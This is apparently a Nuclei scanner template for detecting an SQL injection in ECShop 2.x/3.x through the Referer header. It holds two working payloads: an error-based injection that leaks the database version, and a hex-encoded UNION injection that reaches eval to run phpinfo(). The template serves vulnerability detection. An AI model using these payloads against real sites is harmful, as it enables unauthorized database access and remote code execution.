id: ecshop-sqli

info:
  name: ECShop 2.x/3.x SQL Injection
  author: Lark-lab,ImNightmaree,ritikchaddha
  severity: high
  description: |
    The vulnerability affects ECShop 2.x and 3.x versions allows remote unauthenticated users to inject arbitrary SQL statements into via the 'Referer' header field,and later via SQL injection vulnerability to malicious code injected into the dangerous eval function in order to achieve arbitrary code execution.
  reference:
    - https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
    - https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
    - http://www.wins21.com/mobile/blog/blog_view.html?num=1172
    - https://www.shutingrz.com/post/ad_hack-ec_exploit/
  metadata:
    verified: true
    fofa-query: app="ECShop"
  tags: sqli,php,ecshop

requests:
  - raw:
      - |
        GET /user.php?act=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}

      - |
        GET /user.php?act=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        words:
          - 'XPATH syntax error:'
          - '[error] =>'
          - '[0] => Array'
          - 'MySQL server error report:Array'
        condition: and

      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and